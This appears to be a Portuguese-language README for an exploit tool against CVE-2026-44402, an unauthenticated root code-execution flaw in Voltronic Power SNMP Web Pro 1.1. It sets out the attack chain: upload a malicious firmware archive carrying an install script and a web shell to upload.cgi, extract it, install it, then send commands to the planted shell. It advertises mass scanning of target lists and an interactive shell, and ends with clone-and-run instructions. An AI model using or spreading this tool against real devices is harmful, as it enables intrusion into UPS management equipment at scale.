
Exploit para CVE-2026-44402 que visa o Voltronic Power SNMP Web Pro 1.1, permitindo execução remota de código não autenticada por meio de upload de firmware malicioso. Suporta varredura de alvo único e em massa com shell interativo.
Execução Remota de Código Crítica Não Autenticada (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
Esta ferramenta explora a CVE-2026-44402, uma vulnerabilidade no dispositivo Voltronic Power SNMP Web Pro 1.1 que permite que atacantes não autenticados carreguem um arquivo de firmware malicioso e executem comandos do sistema como root através do endpoint upload.cgi.
| Propriedade | Valor |
|---|
| ID CVE | CVE-2026-44402 |
| Pontuação CVSS | 9.8 (Crítica) |
| CWE | CWE-434 — Upload Irrestrito de Arquivo com Tipo Perigoso |
| Produto Afetado | Voltronic Power SNMP Web Pro 1.1 |
| Autenticação Necessária | NÃO (não autenticado) |
| Vetor de Ataque | Baseado em rede (remoto) |
| Privilégio | RCE em nível de root |
A vulnerabilidade existe na funcionalidade de atualização de firmware (upload.cgi). O endpoint:
Criar Arquivo Malicioso
upgrade/install.sh — script de instalaçãoupgrade/pwned.cgi — web shellCarregar Arquivo → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK" se bem-sucedidoExtrair Arquivo → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK" se bem-sucedidoInstalar → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh é executado como root"ACK" se bem-sucedidoWeb Shell Ativo → POST /cgi-bin/pwned.cgi
cmd → RCE! 🚀-u)-f targets.txt)-t 20) — processamento paralelo rápido--shell) com suporte a cdurl | output--proxy)--timeout)-v) para depuraçãorequests e prompt_toolkit# Clone o repositório
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py